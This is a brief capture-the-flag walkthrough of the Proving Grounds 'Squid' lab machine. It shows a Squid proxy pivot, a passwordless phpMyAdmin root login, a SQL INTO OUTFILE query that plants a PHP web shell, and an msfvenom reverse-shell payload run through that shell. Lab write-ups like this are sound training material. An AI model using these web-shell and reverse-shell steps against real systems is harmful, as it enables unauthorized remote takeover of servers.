Proving grounds Practice - Squid CTF writeup.

Nmap

PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved

Squid http proxy service running on PORT 3128. Use Squid Pivoting Open Port Scanner to perform PORT scanning.

Configure the proxy server IP and PORT in the browser to access the webserver running on PORT 8080.

System Information

PHPMyadmin

Login with username root and password as null.

Execute below sql query to create reverse shell.

SELECT "<?php system($_GET['cmd'])?>" INTO OUTFILE "C:/wamp/www/shell2.php"

As shown in the phpinfo() page the document root folder is C:/wamp/www. So the shell will be publicly accessible at http://192.168.237.189:8080/shell2.php.

Remote Code Execution

http://192.168.237.189:8080/shell2.php?cmd=whoami

Obtain Stable Shell using msfvenom

msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=1234 -o mshell.exe

Use curl to download the shell in to the attacking machine. Run a nc llisterner and execute the reverse shell by visiting http://192.168.237.189:8080/shell2.php?cmd=mshell.exe

Reverse shell obtained.

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.